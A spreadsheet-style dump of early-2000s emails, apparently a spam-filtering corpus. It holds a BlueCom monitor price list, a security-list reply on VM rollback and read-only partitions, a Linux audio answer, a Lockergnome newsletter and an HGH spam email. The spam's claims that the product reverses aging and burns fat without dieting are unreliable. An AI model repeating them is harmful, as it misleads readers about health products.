 &lt;tr bgcolor=3D"#eeeeee"&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;D8902ARR-ABB&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;HP 71 17"  Color Monitor&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 144.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 148,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;11J8846&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;HITACHI 12" LCD Panel 800x600&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ &amp;nbsp;&amp;nbsp;97.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; &amp;nbsp;&amp;nbsp;99,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor=3D"#eeeeee"&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;LW871&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;HEAD 17" TFT Monitor White&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 552.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 563,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;D5063AR&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;HP L1520 15" LCD Color Monitor&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 360.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 371,50&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor=3D"#eeeeee"&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;D8906AR&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;HP P700 17" CRT Monitor&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 135.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 139,50&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Indhold slut --&gt;
 &lt;!-- links --&gt;
 &lt;table align=3Dcenter width=3D"738" border=3D"0" cellpadding=3D"10" cellspacing=3D"0"&gt;
 &lt;tr&gt;
 &lt;td align=3D"left"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#333333"&gt;&lt;b&gt;Please, also visit:&lt;/b&gt;&lt;br&gt;
 &lt;ul type=3D"disc"&gt;
 &lt;li&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1265"&gt;Our website at www.bluecom.com&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1277"&gt;Online web shop&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1278"&gt;PC-component pricelist&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1277"&gt;IBM, Compaq, HP stocklist&lt;/a&gt;&lt;br&gt;
 &lt;/ul&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Click here to contact us now!&lt;p&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1267"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/contact_info.gif" border=3D"0" width=3D"80" height=3D"15" align=3D"bottom" alt=3D"Click here to contact us now!"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- links slut --&gt;
 &lt;!-- footer --&gt;
 &lt;table align=3D"center" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;table align=3D"center" width=3D"738" border=3D"0" cellspacing=3D"0" cellpadding=3D"2" bgcolor=3D"#033262"&gt;
 &lt;tr&gt;
 &lt;td align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FFFFFF"&gt;BLUECOM DANMARK A/S &amp;middot BLOKKEN 11-13 &amp;middot DK-3460 BIRKEROED &amp;middot DENMARK &amp;middot TELEPHONE +45 45 94 55 55 &amp;middot WWW.BLUECOM.COM&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;div align=3Dcenter&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/spacer.gif" width=3D"738" height=3D"1" alt=3D""&gt;&lt;/div&gt;
 &lt;table align=3D"center" width=3D"738" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#000000"&gt;&amp;copy; BlueCom Danmark A/S. 1996 - 2002. All rights reserved.&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3D"right"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/bc_cut270602_64.gif" width=3D"355" height=3D"12" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- footer slut --&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- styretabel slut --&gt;
 &lt;p&gt;
 &lt;img src=3D"http://bluecom.mail2l.com/postingread/postingread.cfm?C=3D7B0F29BE-8C5C-4843-9C6F21B476889157&amp;P=3D2511&amp;E=3Dfork%40xent%2Ecom&amp;EID=3D1280992&amp;EXT=3D0&amp;KEY=3DB2222E6B584B88F3E4815D2C2CF77C45" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/body&gt;
 &lt;/html&gt;
 -----=c_8xk3gaozmp2il98g4_xq03eowmlk--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Ben Mord wrote:
 &gt;     -----Original Message-----
 &gt;     *From:* Crispin Cowan [mailto:crispin@wirex.com]
 &gt;     *Sent:* Wednesday, September 04, 2002 5:46 PM
 &gt;     *To:* Ben Mord
 &gt;     *Cc:* Webappsec Securityfocus.Com; SECPROG Securityfocus
 &gt;     *Subject:* Re: use of base image / delta image for automated
 &gt;     recovery from attacks
 &gt;
 &gt;     Ben Mord wrote:
 &gt;
 &gt;&gt;I was inspired by a mode of operation supported by VMWare. [use VMWare's ability to rolll back state to recover from intrusions]
 &gt;&gt;
 &gt;     I did my dissertation work in this area (Optimistic Computing
 &gt;     &lt;http://www.cse.ogi.edu/%7Ecrispin/hope.pubs.html&gt;) and so was
 &gt;     interested in applying it to the security problem. Unfortunately,
 &gt;     you hit a bunch of problems:
 &gt;
 &gt;         * When can you "commit" a state as being "good"?  You can't
 &gt;           run from a redo log forever; the performance and storage
 &gt;           penalties accumulate. Even log structured file systems
 &gt;           garbage collect eventually. So you have to commit sometime.
 &gt;           The problem is that if you commit too eagerly, you might
 &gt;           commit corrupted state. If you commit too conservatively,
 &gt;           you eat performance and storage penalties.
 &gt;         * What do you do if you discover that there is corrupted state
 &gt;           in the *middle* of your redo log, and you want some of the
 &gt;           critical state that comes after it? You need some way to dig
 &gt;           the corruption out of the middle and save the rest. My
 &gt;           dissertation solves this problem, but you have to re-write
 &gt;           everything in my programming language :)
 &gt;         * Just doing this at all imposes substantial performance
 &gt;           penalties. I love VMWare, and use it every day (the best
 &gt;           $200 I ever spent on software) but it is not very fast.   
 &gt;
 &gt; My proposed solution to the first two problems you mention is to be 
 &gt; less ambitious. The idea is that you *never* commit - instead, you 
 &gt; simply revert to base state on reboot.
 Ah. In that case, you can use something considerably less powerful than 
 VMWare. All you need is a machine configured to boot from CD-ROM and use 
 a RAM disk for scratch space. Numerous Linux distros are available that 
 let you boot a stateless but functional system from CD-ROM.
 &gt; Obviously, you can't do this with partitions that accrue important 
 &gt; state, e.g. a partition that stores database table data.
 ... but if you *do* want some state to persist, then you need a 
 mountable writable partition. To protect it, you need some kind of 
 access control management to decide who can do what to the writable 
 partition, blah blah blah ... and before you know it, the security 
 problem starts to look just like it does for conventional servers.
 Simple approxmation to this: make /usr a separate partion, and mount it 
 read-only:
     * The good news: attackers that want to trojan your software have to
       reboot, at least.
     * The bad news: administrators that want to update your software
       have to reboot, at least.
 Crispin
 -- 
 Crispin Cowan, Ph.D.
 Chief Scientist, WireX                      http://wirex.com/~crispin/
 Security Hardened Linux Distribution:       http://immunix.org
 Available for purchase: http://wirex.com/Products/Immunix/purchase.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ultimate HGH: Make you look and feel 20 YEARS YOUNGER!26035
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging while burning fat,
  without dieting or exercise! This provendiscovery has even been reported on by the New England Journal of Medicine.Forget aging and dieting forever! And it's Guaranteed! 
 Click below to enter our web site:
 http://www.freehostchina.com/washgh/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Click below to enter our web site:
 http://www.freehostchina.com/washgh/
 **************************************************
 If you want to get removed
 from our list please email at- standardoptout@x263.net (subject=remove "your email")
 **************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: alsa:bass and treble
</t>
  </si>
  <si>
    <t xml:space="preserve">Nova Nova wrote:
 &gt; bass and treble settings do not seem to have any affect on the sound.
 Look around for a "Tone" toggle.  Toggle it.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Beefier Vinyl
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020712.html"&gt;
       http://www.lockergnome.com/issues/daily/20020712.html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&lt;/style&gt;&lt;title&gt;20020712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07.12.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font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My mom just notified me of my aunt Theresa's death. She was my
 father's older sister, though I only knew her through a few e-mail
 exchanges and a couple of brief encounters as a child. This news
 came hours after I received ANOTHER bit of disturbing news:
 "Please tell Chris that one of his first fans died last weekend of
 a heart attack at home." I first met Jon Snyder at an Apple user's
 group meeting a couple of years ago; to me, he always looked like
 a beefier Robert Beltran. Death is something we all must deal
 with, but you never seem to be prepared for it when someone
 actually dies. A few months ago, Aunt Theresa sent word that she
 had seen my show. It was good to know that even though we hadn't
 interacted much over the past few years, she was still able to see
 me on TV. And even though you didn't know him, you're closer to
 Jon than you realize. Witness this message he sent to his boss a
 few months ago:
 &lt;p&gt;
 &lt;I&gt;"I evangelized for months last year for having our company at
 the first of these consumer computer conferences in Des Moines
 last October, but got shot down. The conference was a hit despite
 being postponed by 9/11, and having to move the venue at the last
 minute. I know... I was there. So, I'm starting all over again
 being 'pushy' about our presence at this event in August of this
 year. Chris Pirillo, whose Des Moines-based commercial email
 publishing group 'Lockergnome' puts this conference together, is a
 friend of mine. He was the 'kid' hired by TechTV to host their
 Call for Help daily TV program in SF starting last fall. If you
 get the Dish network or Mediacom cable you can catch his show. I
 have my DishPlayer set up to record his show on a daily basis.
 It's VERY well done, as is TechTV as a whole."&lt;/I&gt;
 &lt;p&gt;
 I returned from speaking to another &lt;a href="http://www.dvpc.org/"&gt;user group&lt;/a&gt; the other night and
 found that approximately 100 new GnomeTomes had been ordered.
 Sweet! When I started looking closer at the numbers, I realized
 that Jake was offering his &lt;a href="http://www.gnometomes.com/tome/cat_audio.html"&gt;Converting
 Vinyl LPs to CD&lt;/a&gt; eBook for free - and that's all anybody was
 taking. No, seriously - five hundred orders later, and 99% of them
 were just for that particular title. Now, while I don't have a
 problem with Jake's offer, I do want to encourage you to check out
 the non-free titles (and if you've already looked, please
 &lt;a href="http://www.gnometomes.com/"&gt;look again&lt;/a&gt;). A lot of blood,
 sweat, and tears went into them - and they're just as helpful. In
 fact, Jake's also written one for &lt;A HREF="http://www.gnometomes.com/tome/001924.html"&gt;OS X&lt;/A&gt; (which
 probably wouldn't impress you if you weren't using an Apple
 machine). Although, I'm sure plenty of you use
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver&lt;/a&gt;.
 Which reminds me: Jake's also now authoring our Webmaster Weekly
 newsletter. So, if you haven't read that in a while, I'd encourage
 you to give it another glance. After all, as &lt;A HREF="http://members.aol.com/voicepro/"&gt;Elwood
 Edwards&lt;/A&gt; so finely said: &lt;a href="http://www.lockergnome.com/coolstuff/youvegotlockergnome.mp3"&gt;You've
 Got Lockergnome&lt;/a&gt;! Thanks to &lt;a href="http://www.online-tonight.com/"&gt;David
 Lawrence&lt;/a&gt; for making that MP3 a reality. El can make one with your
 name, too. And yes, that's the AOL guy.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&lt;B&gt;VLINK v0.6.8.0 [257k] W9x FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.vxtech.org/"&gt;http://www.vxtech.org/&lt;/A&gt;
 &lt;P&gt;
 {Desktop link manager} Nothing gets you there faster than a link.
 I mean, imagine if while you're surfing, you had to stop and type
 in a URL every time you wanted to move to a new page. Simply
 unacceptable. So why not have that convenience when working with
 other files? This application gives you the option of opening or
 running any file or program you desire via links. You can also
 shut down your computer or disable your screensaver through this
 program. &amp;quot;No installer is required for VLink - it will not change
 any of your registry settings or other Windows settings; simply
 extract the files PowerLink.dll and VLink.exe to a directory and
 run it.&amp;quot;
 &lt;p&gt;&lt;br&gt;
 &lt;B&gt;GhiaTracker v1.5 [370k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://homepage.mac.com/karmannghia/ghiatracker/"&gt;http://homepage.mac.com/karmannghia/ghiatracker/&lt;/A&gt;
 &lt;P&gt;
 {Learn about your Ghia} Gearheads, motorheads, call them whatever
 you will, but I've never been part of their ranks. Not that I
 don't like cars, mind you; I find them much more useful than pogo
 sticks. If you happen to own a little vehicle known as the Karmann
 Ghia, you should drive on over and download this program. Click on
 any year between 1956 (the year it went into production) and 1974
 to get a brief synopsis of the car and its changes for that year.
 You can also get other specifications such as torque, horsepower,
 compression, etc. Even if you're not &amp;quot;into&amp;quot; cars, check this out.
 This program was created for use on the Mac, but a Windows version
 is also available.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&lt;B&gt;WebTV Viewer v2.6 [6.8M] W9x FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://developer.msntv.com/tools/viewer/"&gt;http://developer.msntv.com/tools/viewer/&lt;/A&gt;
 &lt;P&gt;
 &amp;quot;Preview your sites on WebTV without leaving your PC! The WebTV
 Viewer simulates WebTV on your system. Read the online Viewer
 Installation Guide to find out more on how to use this software.
 Important: the PC version of the WebTV Viewer (2.6) reflects all
 of the features of the most recent upgrade from Spring 2001. Note:
 The Viewer is similar, but not identical, to a real WebTV system.
 The WebTV Viewer program is currently beta-level software on both
 Windows and Macintosh. This means that it has not been completely
 tested and debugged. The WebTV Viewer is like a WebTV browser
 because: it changes page layout by compressing page width and
 enlarging text; and it supports HTML, JavaScript, as well as other
 Internet standards in the same way. The WebTV Viewer is not like a
 WebTV browser because: your computer monitor has a higher
 resolution than a television screen, and displays color better;
 and the Viewer does not support email or audio, while the WebTV
 browser does.&amp;quot;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size="1"&gt;&lt;B&gt;Full PDF Books&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001829.html"&gt;Poor Richard's Web&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001827.html"&gt;Internet Promotions&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001804.html"&gt;E-Mail Publishing&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001830.html"&gt;Web Site Makeover&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001803.html"&gt;Websites Made Easy&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001825.html"&gt;Online Communities&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001826.html"&gt;Home Networking&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001828.html"&gt;Internet Recruiting&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001824.html"&gt;Online Branding&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;B&gt;The Evidence is Against You&lt;/b&gt;
     &lt;br&gt;Scribbled by Jim Girard
 &lt;P&gt;
 Every time some new technology has expanded free access to popular
 music, starting with radio broadcasts of recorded songs in the
 1930s, the recording industry has fought it - claiming that it
 would cost them money. And every time, it has resulted in
 increased sales. The best-known example, of course, was the
 advances in tape cassette technology in the 60s and 70s, including
 Dolby sound technology. As with MP3, this technology was opposed
 by the music industry as different from previous such
 developments, because it made it possible for ordinary people to
 create their own copies at near-professional quality. The actual
 result was the creation of a whole new profit center for the music
 industry - pre-recorded cassette tapes - which actually became
 more popular than vinyl for a while (before the advent of CD
 technology).
 &lt;P&gt;
 The thing is, the music industry is well aware of this effect -
  and they are not really aiming to stop the private exchange of
 songs in MP3 format. If that were their goal, they'd be
 instituting widespread, aggressive legal actions against all the
 server-centered nodes (as they did against all radio stations
 playing their music in the 30s, when they really thought the
 phenomenon was going to wipe them out). Instead, they have focused
 on the best-known services - first Napster, then Morpheus, KaZaA,
 and most recently, Audiogalaxy. Even in those cases, they've
 limited their legal challenges to things they know they can win -
  and they've avoided actual court trials whenever possible (to
 avoid the possibility of setting some damaging precedent).
 &lt;P&gt;
 The point that seems to escape a lot of people is that copyright
 is not a property in the same sense as most of the things we think
 of as property. One key difference is that if you don't defend it,
 you lose it. If you left your car sitting in the driveway, with
 the window open and the keys in the ignition, and somebody drove
 away in it, that would still be theft - and you'd still be
 entitled to get your car back. Not so with copyright. If you are
 aware of infringement and you do nothing to try to stop it, you
 are voluntarily allowing it to enter the public domain. It's for
 the same reason that big companies insist that newspapers put a
 copyright or trademark symbol after the names of their products
 whenever they're mentioned, and not use words like &amp;quot;Coke&amp;quot; or
 &amp;quot;Kleenex&amp;quot; as generic terms. They don't really expect everybody to
 do what they say - and they're well aware that having the name of
 one's product become the generic term for a product is actually a
 great marketing boon. But if they DON'T do that, someone at some
 point could start using the word on their own product, arguing
 that it is in the public domain.
 &lt;P&gt;
 The efforts of the music industry are not aimed at actually
 stopping the exchange of music between individuals - which they
 know from long experience, increases their sales because most of
 the people who normally buy the music aren't really satisfied with
 near-perfect copies. For most of them, the learning curve and the
 cost in time of creating those copies themselves outweighs the
 cost of simply buying the CD. Most of the outright piracy is
 committed by people who wouldn't have bought the music in the
 first place. What the music industry is doing is clearly aimed at
 establishing a public record of their efforts to defend copyright,
 in the broadest, most public way; to prevent anyone from making a
 legal claim that the stuff they own has entered the public domain.
 The thing they're really worried about, in terms of profits, is
 the change in the marketing model. Even legitimate online music
 commerce threatens the album format, with its traditional mix of a
 few good songs and a bunch of others most people wouldn't pay for
 if they were buying the stuff song by song. The problem is how to
 make as much money on a per-song basis - and, at the moment, it
 requires charging far more for an individual song that most people
 are willing to pay.
 &lt;P&gt;
 At any rate, copyright is actually a fairly complex matter of
 civil law, with a good deal of history behind it - dating back to
 the Renaissance. The strategies music companies use are clearly
 directed to realities and necessities, in light of history and
 case law. They have also done a great PR job, convincing the most
 technically knowledgeable people on the Internet that it is a
 simple moral or criminal issue. &amp;quot;Common sense&amp;quot; tells a lot of
 people that copying music without paying for it is just like
 stealing someone's car, and represents a loss to the owner. But if
 common sense could decide the issue equitably, we wouldn't have
 the law in the first place. Most of our great intellectual
 systems, including not only law but science, are designed in large
 part to overcome the errors of common sense, and that is more the
 case in civil law than criminal. The people who work within those
 systems are well aware of that, but they are also well aware that
 most people aren't - and that it can work to their advantage. Any
 time a highly paid civil attorney begins by telling you that an
 issue vital to his client is actually very simple, or just a
 matter of common sense, there's a very high probability that what
 he means is that it's to his clients advantage if people like you
 believe that. If it really WERE that simple, the client wouldn't
 be paying him as much as he is.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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;A BOOK FOR EVERY GEEK:&lt;/b&gt; Want to know more about &lt;a href="http://www.gnometomes.com/tome/001826.html"&gt;networking&lt;/a&gt;? Have you ever wanted to &lt;a href="http://www.gnometomes.com/tome/001843.html"&gt;write an e-book&lt;/a&gt;? Maybe you need to polish your &lt;a href="http://www.gnometomes.com/tome/001829.html"&gt;Web design&lt;/a&gt; skills? Get full-length books from the Poor Richard's series, including &lt;b&gt;Poor Richard's E-mail Publishing&lt;/b&gt;, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. &lt;a href="http://www.gnometomes.com"&gt;Click here&lt;/a&gt; to learn more.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;My Virtual Model&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.myvirtualmodel.com/"&gt;http://www.myvirtualmodel.com/&lt;/A&gt;
 &lt;P&gt;
 {Make a model of you} Wouldn't it be cool if you could physically
 walk into cyberspace? Well, you can't... so stop thinking about
 it. However, you can design a virtual model of yourself on this
 site. Choose your features like body shape, eyes, nose, lips,
 facial hair, height, and weight. The amazing thing is how closely
 your model resembles you. My only complaint is that you can't add
 glasses. How in the heck is my digital doppelganger supposed to
 see? Once you're finished, the site can even offer style advice
 for your body type. (I'll stick with plaid, thank you very much.)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size="1"&gt;&lt;B&gt;Our Tip eBooks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Terms&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 Who has no trouble with controling his codes? Lockergnomie Wayne
 Smith: &amp;quot;Here is a bit of information specifically for Hotmail
 users who may have trouble opening your links, due to the service
 wanting to place the referred URL in a separate frame. I receive
 my Lockergnome newsletters via Hotmail and find it really useful
 when you folks include the link as text. However, sometimes this
 isn't practical - or it stops the flow of the article. The trouble
 here is that the link sometimes returns the message: 'There was an
 error displaying this link' in the frame. No problem! Right-click,
 copy shortcut, paste to metapad (freeware from LIQUIDNINJA.COM),
 then do a global search and replace. The trick is to replace the
 control codes with the correct characters: %26 is an ampersand;
 %3a is a colon; %2e is a period; %20 is a blank space; %2f is a
 forward slash; %3d is an equals symbol; %3f is a question mark.
 The Windows character map can help with any others. Select a
 character, look at the status bar, replace 'U+[code]' with the
 percent sign. In other words, the ampersand (U+0026) is %26 which
 translastes into a '&amp;amp;' symbol. Maybe a more clever Gnomie can come
 up with some script which we can place in the 'Web' folder,
 correctly register, and use in IE's right-click / context menu?&amp;quot;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href="http://www.lockergnome.com/issues/daily/20020712.html"&gt;http://www.lockergnome.com/issues/daily/20020712.html&lt;/a&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;MP3 SOFTWARE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
